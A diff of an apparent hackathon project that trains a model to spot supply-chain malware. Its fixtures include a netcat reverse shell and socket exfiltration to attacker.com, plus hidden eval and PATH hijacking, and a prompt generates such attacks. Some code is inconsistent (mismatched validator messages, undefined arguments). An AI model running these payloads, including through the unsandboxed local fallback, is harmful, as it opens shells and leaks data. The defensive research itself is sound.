+        "attack_type": "typosquatting"
+    },
+    {
+        "id": "tp_18963f71",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    },
+    {
+        "id": "tp_4c4f927a",
+        "type": "true_positive",
+        "code_snippet": "import subprocess\ntry:\n    subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n    pass\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "subprocess_backdoor"
+    },
+    {
+        "id": "tp_4ea9d228",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_f417c9df",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n    \"\"\"Check if a number is prime.\"\"\"\n    if n <= 1:\n        return False\n    for i in range(2, int(n ** 0.5) + 1):\n        if n % i == 0:\n            return False\n    return True",
+        "patch": "def is_prime(n):\n    \"\"\"Check if a number is prime.\"\"\"\n    if n <= 1:\n        return False\n    for i in range(2, int(n ** 0.5) + 1):\n        if n % i == 0:\n            return False\n    return True",
+        "unit_test_code": "import code\nassert code.is_prime(7) == True\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_bde0820e",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n    \"\"\"Parse simple CSV content.\"\"\"\n    lines = csv_content.strip().split('\\n')\n    if not lines:\n        return []\n    headers = lines[0].split(',')\n    result = []\n    for line in lines[1:]:\n        values = line.split(',')\n        result.append(dict(zip(headers, values)))\n    return result",
+        "patch": "def parse_csv(csv_content):\n    \"\"\"Parse simple CSV content.\"\"\"\n    lines = csv_content.strip().split('\\n')\n    if not lines:\n        return []\n    headers = lines[0].split(',')\n    result = []\n    for line in lines[1:]:\n        values = line.split(',')\n        result.append(dict(zip(headers, values)))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "fn_d6a7e145",
+        "type": "functional",
+        "code_snippet": "class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    \"\"\"A simple linked list.\"\"\"\n    def __init__(self):\n        self.head = None\n        \n    def append(self, data):\n        new_node = Node(data)\n        if not self.head:\n            self.head = new_node\n            return\n        last = self.head\n        while last.next:\n            last = last.next\n        last.next = new_node",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_69568e28",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fn_7abd4b1e",
+        "type": "functional",
+        "code_snippet": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_56b026a4",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n    \"\"\"Parse simple log lines into level and message.\"\"\"\n    parsed = []\n    for line in log_lines:\n        parts = line.split(' - ', 1)\n        if len(parts) == 2:\n            parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n    return parsed",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_9691b992",
+        "type": "functional",
+        "code_snippet": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_477c7ba9",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_f65258dd",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\ndef celsius_to_fahrenheit(c):\n    \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n    return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n    \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n    return (f - 32) * 5/9",
+        "patch": null,
+        "unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_7ed224be",
+        "type": "functional",
+        "code_snippet": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_6523f26b",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    }
+]

sentinel_synth/data/sdk_config.yaml ADDED Viewed

	@@ -0,0 +1,33 @@

+# Meta Synthetic Data Kit Configuration for Sentinel-Synth
+# This file defines how the SDK should generate synthetic vulnerabilities.
+vllm:
+  api_base: "http://localhost:8000/v1"
+  model: "meta-llama/Llama-3.1-8B-Instruct"
+generation:
+  temperature: 0.8
+  top_p: 0.95
+  max_tokens: 1024
+  num_pairs: 5          # Number of examples per ingest chunk
+prompts:
+  # Standard prompt for generating malicious supply-chain code
+  code_generation: |
+    You are a cybersecurity research assistant specializing in supply-chain security.
+    Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
+    The vulnerability should be one of:
+    - Typosquatting (importing a malicious package similar to a popular one)
+    - Obfuscated execution (exec/eval with base64/zlib encoding)
+    - Environment hijacking (modifying PATH or other critical env vars)
+    - Subprocess backdoors (reverse shells or hidden command execution)
+    - Malicious __import__ tricks
+    After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
+    Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
+    Format the output as a JSON object with keys:
+    - code_snippet: the vulnerable code
+    - patch: the fixed code
+    - unit_test_code: the validation test
+    - attack_type: the category of the attack

sentinel_synth/envs/__init__.py ADDED Viewed

File without changes

sentinel_synth/envs/sentinel_env.py ADDED Viewed

	@@ -0,0 +1,175 @@

+import gymnasium as gym
+from gymnasium import spaces
+import json
+import numpy as np
+from pathlib import Path
+import random
+from ..validation.docker_runner import run_code
+from ..validation.patch_validator import validate_patch
+class SentinelEnv(gym.Env):
+    """
+    Gymnasium environment for Sentinel-Synth
+    """
+    metadata = {"render_modes": ["human"]}
+    ACTION_ANALYZE = 0
+    ACTION_EXECUTE_SANDBOX = 1
+    ACTION_BLOCK_PR = 2
+    ACTION_SUBMIT_PATCH = 3
+    ACTION_REQUEST_REVIEW = 4
+    def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
+        super().__init__()
+        self.use_docker = use_docker
+        self.scenarios_path = scenarios_path
+        self.scenarios = self._load_scenarios()
+        self.current_scenario = None
+        self.step_counter = 0
+        self.max_steps = 5
+        # Define Observation Space
+        # text max length 5000 chars
+        self.observation_space = spaces.Dict(
+            {
+                "code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
+                "static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
+                "risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
+            }
+        )
+        # Define Action Space
+        self.action_space = spaces.Discrete(5)
+    def _load_scenarios(self):
+        try:
+            with open(self.scenarios_path, "r") as f:
+                return json.load(f)
+        except Exception as e:
+            print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
+            return []
+    def _compute_static_flags(self, code_snippet: str):
+        flags = np.zeros(5, dtype=np.int32)
+        if "eval(" in code_snippet or "exec(" in code_snippet:
+            flags[0] = 1
+        if "subprocess" in code_snippet or "os.system" in code_snippet:
+            flags[1] = 1
+        if "socket" in code_snippet or "requests" in code_snippet:
+            flags[2] = 1
+        if "os.environ" in code_snippet:
+            flags[3] = 1
+        if "base64" in code_snippet or "zlib" in code_snippet:
+            flags[4] = 1
+        return flags
+    def _get_obs(self):
+        code = self.current_scenario["code_snippet"]
+        # truncate code to 5000 chars to fit text space
+        if len(code) > 5000:
+             code = code[:5000]
+        flags = self._compute_static_flags(code)
+        risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)
+        return {
+            "code_snippet": code,
+            "static_flags": flags,
+            "risk_score": risk_score
+        }
+    def reset(self, seed=None, options=None):
+        super().reset(seed=seed)
+        if not self.scenarios:
+             # Fallback if no scenarios to prevent crash
+             self.current_scenario = {
+                 "id": "fallback", "type": "functional", "label": "benign",
+                 "code_snippet": "print('hello')", "patch": None
+             }
+        else:
+             # We can optionally pass a specific scenario via options
+             if options and "scenario" in options:
+                 self.current_scenario = options["scenario"]
+             else:
+                 self.current_scenario = random.choice(self.scenarios)
+        self.step_counter = 0
+        self.last_action = None
+        self.last_reward = 0
+        return self._get_obs(), {}
+    def step(self, action):
+        self.step_counter += 1
+        reward = 0
+        done = False
+        info = {}
+        self.last_action = action
+        if action == self.ACTION_ANALYZE:
+            # Small exploration reward for analyzing
+            reward = 0.05
+            info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}
+        elif action == self.ACTION_EXECUTE_SANDBOX:
+            # Execute code snippet
+            result = run_code(self.current_scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
+            info = {"telemetry": result}
+            # Shaped reward for gathering info
+            reward = 0.1
+        elif action == self.ACTION_BLOCK_PR:
+            if self.current_scenario["label"] == "malicious":
+                reward = 1.5 # Correctly blocked
+            else:
+                reward = -2.0 # False positive block
+            done = True
+        elif action == self.ACTION_SUBMIT_PATCH:
+            scenario_patch = self.current_scenario.get("patch")
+            if not scenario_patch:
+                if self.current_scenario["label"] == "benign":
+                    # Benign code doesn't need a patch, but submitting one is a mistake
+                    reward = -1.0
+                else:
+                    # Should have a patch for malicious, but it's missing in scenario?
+                    reward = -0.5
+            else:
+                success, msg, details = validate_patch(self.current_scenario, scenario_patch, use_docker=self.use_docker)
+                info = {"validation_success": success, "msg": msg, "details": details}
+                if success:
+                    if self.current_scenario["label"] == "malicious":
+                        reward = 4.0 # High reward for fixing vulnerability
+                    else:
+                        reward = -2.5 # High penalty for breaking benign code
+                else:
+                    reward = -1.5 # Patch failed validation
+            done = True
+        elif action == self.ACTION_REQUEST_REVIEW:
+            if self.current_scenario["type"] == "false_positive":
+                reward = 0.5 # Good choice for ambiguous cases
+            else:
+                reward = 0.0
+            done = True
+            info = {"review_requested": True}
+        # Check max steps
+        if self.step_counter >= self.max_steps and not done:
+            reward -= 0.5 # Penalty for timeout
+            done = True
+        self.last_reward = reward
+        return self._get_obs(), reward, done, False, info
+    def render(self):
+        print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")

sentinel_synth/tests/__init__.py ADDED Viewed

File without changes

sentinel_synth/tests/test_validator.py ADDED Viewed

	@@ -0,0 +1,57 @@

+import pytest
+from sentinel_synth.validation.patch_validator import validate_patch
+def test_syntax_error_detected():
+    scenario = {"type": "functional", "code_snippet": "print('hello')", "unit_test_code": None}
+    patch = "print('hello"  # Missing closing quote
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Syntax error"
+    assert "error" in details
+def test_unit_test_pass():
+    scenario = {
+        "type": "functional",
+        "code_snippet": "def add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    patch = "def add(a, b):\n    return a + b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is True
+    assert msg == "Patch is valid"
+def test_unit_test_fail():
+    scenario = {
+        "type": "functional",
+        "code_snippet": "def add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    # Breaking the functionality in the patch
+    patch = "def add(a, b):\n    return a - b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Unit test failed"
+    assert "test_output" in details
+def test_vulnerability_remains():
+    # Attack injects a hidden print which simulates a backdoor
+    scenario = {
+        "type": "true_positive",
+        "attack_type": "obfuscated_exec",
+        "code_snippet": "print('Hello from hidden exec!')\ndef add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    # Patch fails to remove the backdoor, only formats the code
+    patch = "print('Hello from hidden exec!')\ndef add(a, b):\n    return a + b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Vulnerability remains"
+    assert "evidence" in details

sentinel_synth/training/__init__.py ADDED Viewed

File without changes

sentinel_synth/training/train_grpo.py ADDED Viewed

	@@ -0,0 +1,187 @@

+import os
+import argparse
+import numpy as np
+try:
+    import wandb
+except ImportError:
+    wandb = None
+# In a real environment, we would also import:
+# from unsloth import FastLanguageModel
+# from trl import GRPOTrainer, GRPOConfig
+# But for the hackathon prototype and safe execution without massive deps,
+# we use mock classes in dry-run mode if the real ones aren't available.
+from ..envs.sentinel_env import SentinelEnv
+def train_agent(args):
+    """
+    Main training loop for Sentinel-Synth GRPO.
+    """
+    # 1. Setup WandB
+    if not args.dry_run:
+        wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))
+    else:
+        print("[DRY RUN] WandB initialization skipped.")
+    # 2. Load Environment
+    env = SentinelEnv(use_docker=args.use_docker)
+    print(f"Loaded environment with {len(env.scenarios)} scenarios.")
+    # 3. Load Model (Mock or unsloth)
+    if args.dry_run:
+        print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")
+        def dummy_policy(obs):
+            # Deterministic dummy policy for dry runs
+            risk = obs["risk_score"][0]
+            if risk > 0.5:
+                 return 3 # ACTION_SUBMIT_PATCH
+            return 0 # ACTION_ANALYZE
+        # 4. Dummy Training Loop
+        epochs = 3
+        batch_size = 4
+        for epoch in range(epochs):
+            print(f"--- Epoch {epoch+1}/{epochs} ---")
+            total_rewards = []
+            for batch_idx in range(len(env.scenarios) // batch_size):
+                trajectories = []
+                for g in range(args.group_size):
+                    obs, _ = env.reset()
+                    done = False
+                    trajectory_reward = 0
+                    steps = 0
+                    while not done and steps < env.max_steps:
+                        action = dummy_policy(obs)
+                        obs, reward, done, _, info = env.step(action)
+                        trajectory_reward += reward
+                        steps += 1
+                    trajectories.append(trajectory_reward)
+                # Mock GRPO Advantage calculation
+                mean_reward = np.mean(trajectories)
+                std_reward = np.std(trajectories) + 1e-8
+                advantages = [(r - mean_reward) / std_reward for r in trajectories]
+                total_rewards.append(mean_reward)
+                print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")
+            print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")
+            if not args.dry_run:
+                wandb.log({"epoch": epoch+1, "mean_reward": np.mean(total_rewards)})
+        print("[DRY RUN] Training complete. Saved dummy adapter to ./grpo_lora/")
+    else:
+        print("Initializing true GRPO training with trl and unsloth...")
+        try:
+            from unsloth import FastLanguageModel
+            from unsloth import is_bfloat16_supported
+            from trl import GRPOTrainer, GRPOConfig
+            from datasets import Dataset
+            max_seq_length = args.max_seq_len
+            model, tokenizer = FastLanguageModel.from_pretrained(
+                model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
+                max_seq_length=max_seq_length,
+                load_in_4bit=True,
+            )
+            model = FastLanguageModel.get_peft_model(
+                model,
+                r=16,
+                target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
+                                "gate_proj", "up_proj", "down_proj"],
+                lora_alpha=16,
+                lora_dropout=0,
+                bias="none",
+                use_gradient_checkpointing="unsloth",
+                random_state=3407,
+            )
+            # Formulate training as text completion where PPO builds on top.
+            # In GRPO, we can provide a reward function that evaluates completions.
+            import re
+            def env_reward_function(completions, prompts, **kwargs):
+                """
+                Extracts chosen action, runs env, returns reward array.
+                Matches completions to their corresponding scenario from prompts.
+                """
+                rewards = []
+                for prompt, completion in zip(prompts, completions):
+                    # extract the action from the completion using regex
+                    text = completion[0]["content"]
+                    match = re.search(r"<action>(\d+)</action>", text)
+                    if match:
+                        try:
+                            action = int(match.group(1))
+                        except ValueError:
+                            action = SentinelEnv.ACTION_ANALYZE
+                    else:
+                        action = SentinelEnv.ACTION_ANALYZE
+                    # Find which scenario this prompt belongs to
+                    # (In a real setup we'd pass IDs, here we search by substring)
+                    target_scenario = None
+                    for s in env.scenarios:
+                        if s["code_snippet"][:100] in prompt:
+                            target_scenario = s
+                            break
+                    if not target_scenario:
+                        rewards.append(0.0)
+                        continue
+                    # Reset env with this specific scenario
+                    obs, info = env.reset(options={"scenario": target_scenario})
+                    _, reward, _, _, _ = env.step(action)
+                    rewards.append(reward)
+                return rewards
+            # We need a proper dataset of prompts
+            prompt_data = [{"prompt": f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."} for s in env.scenarios]
+            dataset = Dataset.from_list(prompt_data)
+            training_args = GRPOConfig(
+                output_dir="grpo_lora",
+                learning_rate=args.learning_rate,
+                per_device_train_batch_size=1,
+                gradient_accumulation_steps=args.gradient_accumulation_steps,
+                max_prompt_length=args.max_seq_len // 2,
+                max_completion_length=args.max_seq_len // 2,
+                num_generations=args.group_size,
+                max_steps=args.max_steps,
+                save_steps=50,
+                logging_steps=10,
+                report_to="wandb",
+            )
+            trainer = GRPOTrainer(
+                model=model,
+                reward_funcs=[env_reward_function],
+                args=training_args,
+                train_dataset=dataset,
+            )
+            trainer.train()
+            model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
+            print("Training complete and adapter saved.")
+        except ImportError as e:
+            print(f"Skipping standard training fallback. Missing required dependency: {e}")
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
+    parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
+    parser.add_argument("--learning-rate", type=float, default=1e-6)
+    parser.add_argument("--group-size", type=int, default=4)
+    parser.add_argument("--max-seq-len", type=int, default=1024)
+    args = parser.parse_args()
+    train_agent(args)

sentinel_synth/validation/__init__.py ADDED Viewed

File without changes

sentinel_synth/validation/docker_runner.py ADDED Viewed

	@@ -0,0 +1,107 @@

+import os
+import tempfile
+import subprocess
+import shutil
+# To support --no-docker or environments where docker isn't running yet.
+def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
+    """
+    Executes Python code in an isolated environment.
+    If use_docker is True, runs in `sentinel-sandbox:latest`.
+    If False, runs locally using subprocess (UNSAFE for real workloads, but fine for demo/dev).
+    """
+    temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
+    script_path = os.path.join(temp_dir, "script.py")
+    with open(script_path, "w") as f:
+        f.write(code)
+    result = {
+        "stdout": "",
+        "stderr": "",
+        "exit_code": -1,
+        "network_blocked": use_docker,
+        "file_writes": []
+    }
+    try:
+        if use_docker:
+            # We assume docker CLI is available.
+            # `docker run --rm --network none --memory 256m --cpus 0.5 -v temp_dir:/app sentinel-sandbox python /app/script.py`
+            cmd = [
+                "docker", "run", "--rm",
+                "--network", "none",
+                "--memory", "256m",
+                "--cpus", "0.5",
+                "-v", f"{temp_dir}:/app",
+                "sentinel-sandbox:latest",
+                "python", "/app/script.py"
+            ]
+        else:
+            # Local fallback (UNSAFE but necessary if Docker is unavailable)
+            cmd = ["python3", script_path]
+        process = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=timeout_sec
+        )
+        result["stdout"] = process.stdout
+        result["stderr"] = process.stderr
+        result["exit_code"] = process.returncode
+        # Check if the code wrote any *new* files to the temp dir
+        for filename in os.listdir(temp_dir):
+            if filename != "script.py":
+                result["file_writes"].append(filename)
+    except subprocess.TimeoutExpired as e:
+        result["stderr"] = "Execution timed out."
+        if use_docker and hasattr(e, 'stdout') and e.stdout:
+             result["stdout"] = e.stdout.decode('utf-8', errors='ignore') if isinstance(e.stdout, bytes) else e.stdout
+    except Exception as e:
+        result["stderr"] = f"Execution error: {str(e)}"
+    finally:
+        shutil.rmtree(temp_dir, ignore_errors=True)
+    return result
+def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
+    """Check python syntax of the code without fully executing it."""
+    temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
+    script_path = os.path.join(temp_dir, "script.py")
+    with open(script_path, "w") as f:
+        f.write(code)
+    try:
+        if use_docker:
+            cmd = [
+                "docker", "run", "--rm",
+                "-v", f"{temp_dir}:/app",
+                "sentinel-sandbox:latest",
+                "python", "-m", "py_compile", "/app/script.py"
+            ]
+        else:
+            cmd = ["python3", "-m", "py_compile", script_path]
+        process = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=5
+        )
+        if process.returncode == 0:
+            return True, ""
+        else:
+            return False, process.stderr
+    except subprocess.TimeoutExpired:
+         return False, "Syntax check timed out"
+    except Exception as e:
+         return False, f"Syntax check failed: {e}"
+    finally:
+         shutil.rmtree(temp_dir, ignore_errors=True)

sentinel_synth/validation/patch_validator.py ADDED Viewed

	@@ -0,0 +1,87 @@

+import os
+import tempfile
+import textwrap
+from .docker_runner import run_code, check_syntax
+def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
+    """
+    Validates a patch using a 3-step pipeline:
+    1. Syntax Check
+    2. Unit Test Execution
+    3. Re-attack (Vulnerability Verification)
+    Returns: (success, message, details_dict)
+    """
+    details = {}
+    # 1. Syntax Check
+    is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
+    if not is_valid:
+        details["error"] = err_msg
+        return False, "Syntax error", details
+    # 2. Unit Test Execution
+    if scenario.get("unit_test_code"):
+        # We need to run the unit test code.
+        # test.py contains something like: "import code; assert code.func() == expected"
+        # We write patched code to a module 'code.py', and run 'test.py'
+        # We can construct a combined script that writes the 'code' module dynamically,
+        # or we just embed the patched code and the test code in one unified runner.
+        # Easiest way in a single file runner (since docker_runner runs a single script):
+        combined_script = f"""import sys
+import types
+# Create a mock 'code' module
+module = types.ModuleType('code')
+exec('''{patch_code}''', module.__dict__)
+sys.modules['code'] = module
+# Run the unit test
+{scenario['unit_test_code']}
+print("TEST_SUCCESS")
+"""
+        result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
+        if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
+            details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
+            return False, "Unit test failed", details
+    # 3. Re-attack (Vulnerability Verification)
+    if scenario["type"] == "true_positive" and scenario.get("attack_type"):
+        # Run original code snippet to get baseline malicious behavior
+        attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)
+        # Run patched code
+        patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)
+        vulnerability_remains = False
+        # Generic heuristic: Did the patch reduce suspicious side-effects?
+        # 1. Compare file writes (malicious often creates/modifies files)
+        if len(patch_result.get("file_writes", [])) >= len(attack_result.get("file_writes", [])) and len(attack_result.get("file_writes", [])) > 0:
+             # Basic check: if attack result has file writes and patch still has them or more
+             vulnerability_remains = True
+        # 2. Compare network attempts (if telemetry includes it)
+        if patch_result.get("network_blocked") and attack_result.get("network_blocked"):
+             vulnerability_remains = True
+        # 3. Specific attack type checks (refined)
+        if scenario["attack_type"] == "typosquatting":
+            if "ImportError" in patch_result["stderr"] and "pythonn" in patch_result["stderr"]:
+                vulnerability_remains = True
+        elif scenario["attack_type"] == "obfuscated_exec":
+            # If the patch still produces the same specific output as the obfuscated one
+            if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
+                 vulnerability_remains = True
+        if vulnerability_remains:
+            details["evidence"] = {
+                "attack_telemetry": attack_result,
+                "patch_telemetry": patch_result
+            }
+            return False, "Vulnerability still accessible", details
+    details["validation_log"] = "All checks passed successfully."
+    return True, "Patch is valid", details

setup.py ADDED Viewed

	@@ -0,0 +1,15 @@

+from setuptools import setup, find_packages
+setup(
+    name="sentinel_synth",
+    version="0.1.0",
+    packages=find_packages(),
+    install_requires=[
+        "gymnasium>=0.29.0",
+        "docker>=7.0.0",
+        "streamlit>=1.30.0",
+        "wandb>=0.16.0",
+        "pytest>=8.0.0",
+        "synthetic-data-kit>=0.1.0"
+    ]
+)